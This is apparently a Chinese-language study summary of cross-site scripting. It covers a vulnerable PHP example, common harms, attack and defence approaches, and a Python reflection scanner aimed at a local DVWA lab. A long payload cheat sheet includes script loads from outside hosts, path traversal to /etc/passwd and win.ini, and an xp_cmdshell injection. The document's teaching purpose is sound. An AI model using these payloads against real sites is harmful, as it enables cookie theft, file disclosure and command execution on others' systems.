XSS漏洞学习总结
1.什么是xss漏洞
<?php
if(isset($_GET['content'])){
$content=$_GET['content'];
echo "你输入的内容是$content";
}else{
echo "请输入正确的参数content";
}
?>
访问该页面,并以GET方式给content参数赋值,页面响应如下
当我们输入<script>alert(1)</script>
,页面响应如下
上面就是xss漏洞的体现场景,也算一种注入漏洞。
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击,XSS又分为:存储型 、反射型 、DOM型XSS。
再尝试下面的payload试试
<script>var res = 0;for(var i = 10;i>=0;i--){res -= i;}alert(res)</script>
不仅如此,在一些事件中也可以触发xss漏洞,比如:
onclick;onerror;onmouseover;onload
等,其他标签也可以尝试<img src=></img>
,<a href=''></a>
content=<img src="smiley-2.gif" alt="Go to W3CSchool.cc!" onerror=alert('watchout!') width="420" height="420" border="0">
2.xss危害及常见攻击payload
- 窃取用户Cookie
- 后台增删改文章
- 钓鱼攻击
- 利用XSS漏洞进行传播和修改网页代码
- XSS蠕虫攻击
- 网站重定向
- 获取键盘记录
- 获取用户信息等
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
"<IMG src=java\0script:alert(\"XSS\")>";' > out
<IMG src=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND src="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert('XSS');">
<IMG src='vbscript:msgbox("XSS")'>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME src=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE href="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML src="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
3.xss攻击思路
-
测试输入是否回显在浏览器页面。
-
尝试输入<>""等字符,查看是否被转义。
-
输出在script标签内,则插入语法正确的payload尝试;若输出回显在字符串内,可以尝试使用双引号、单引号进行闭合。
-
输出在html属性标签内,尝试进行闭合,在添加新属性,如onclick等事件。如字符被html实体编码,则html在解析是会自动进行实体解码,可以尝试任意字符实体编码进行注入。
-
输出在js内,空格被过滤,尝试使用/**/代替空格(%0A),或者对后续代码进行注释。+:%2B
-
输出在js注释内,设法插入%0A,%0D等,尝试逃逸出来。
-
输出在js字符串内:尝试进行十六进制编码,base64编码。
4.xss防御思路
- 对输入和url参数做白名单过滤。
- 特殊字符进行转义。
- html字符实体编码
- 对输出内容进行编码和转义
5.xss简单python脚本实现
其实xss的python脚本实现,核心思想就是输入能否被回显,利用这一点,尝试遍历xss字典,如果有payload完整回显,就可能存在xss漏洞。
以下是我在本地搭建的dvwa靶场,进行xss简单的扫描。
import requests
url_tset = "http://dvwa/vulnerabilities/xss_r/?name=hello";
# cookie="PHPSESSID=4qurffd5vvn1ej8lf95b8cv432;security=low"
cookie1 = {'PHPSESSID': '4qurffd5vvn1ej8lf95b8cv432', 'security': 'low'}
cookie2 = {'PHPSESSID': '4qurffd5vvn1ej8lf95b8cv432', 'security': 'medium'}
def xss_scan(target,cookie):
url = target.split('?')[0]
paraList = target.split('?')[1] # name=hello
key = paraList.split('=')[0] # name
# print(key)
# print(paraList)
# payload = paraList.split('=')[1] #hello
with open('xsspayload.txt', 'r') as f:
payload_list = f.readlines();
for payload in payload_list:
# print(payload)
response = requests.get(url=url, params={key: payload.strip()}, cookies=cookie)
# print(response.txt)
# print(url + '?' + key + '=' + payload)
if payload.strip() in response.text:
print("可能存在注入点,payload为:" + payload)
if __name__ == '__main__':
# xss_scan(url_tset,cookie1)
xss_scan(url_tset,cookie2)